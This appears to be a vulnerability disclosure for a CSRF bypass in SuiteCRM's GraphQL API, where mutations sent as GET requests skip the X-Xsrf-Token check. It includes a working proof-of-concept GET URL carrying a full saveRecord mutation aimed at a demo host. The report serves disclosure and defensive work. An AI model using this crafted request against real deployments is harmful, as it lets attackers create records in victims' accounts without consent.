# Description
Mutations are `saveRecord` or `createProcess` queries used in Graphql. SuiteCRM prevents CSRF in this functionality by sending a POST request with a X-Xsrf-Token header. the bug here is that, when we send a GET request, the backend does not expect the X-Xsrf-Token header. Using this, an attacker cound leverage this to bypass the existing CSRF protection.
# Proof of Concept :
* Save it with html extension and click on submit request and the user account is created .
“`
“`
#URL used in “GET“ request
“`
https://suite8demo.suiteondemand.com/api/graphql?query=mutation{saveRecord(input:{module:%22accounts%22,attributes:{assigned_user_name:{user_name:%22will%22},name:%22test%22,phone_office:%22%22,phone_alternate:%22%22,website:%22https://google.com%22,phone_fax:%22%22,email_addresses:[],billing_address:%22%22,billing_address_street:%22%22,billing_address_city:%22%22,billing_address_state:%22%22,billing_address_postalcode:%22%22,billing_address_country:%22%22,shipping_address:%22%22,shipping_address_street:%22%22,shipping_address_city:%22%22,shipping_address_state:%22%22,shipping_address_postalcode:%22%22,shipping_address_country:%22%22,description:%22%22,account_type:%22%22,industry:%22%22,annual_revenue:%22%22,employees:%22%22,parent_name:%22%22,campaign_name:%22%22,date_entered:%22%22,date_modified:%22%22}}){clientMutationId,record{attributes,id,_id,module,acls,type,favorite}}}
“`
#Poc:
“`
https://drive.google.com/file/d/1yBXsdp98SV8Ji7YtGf378EbdKAXkGfG8/view?usp=sharing
“`Read More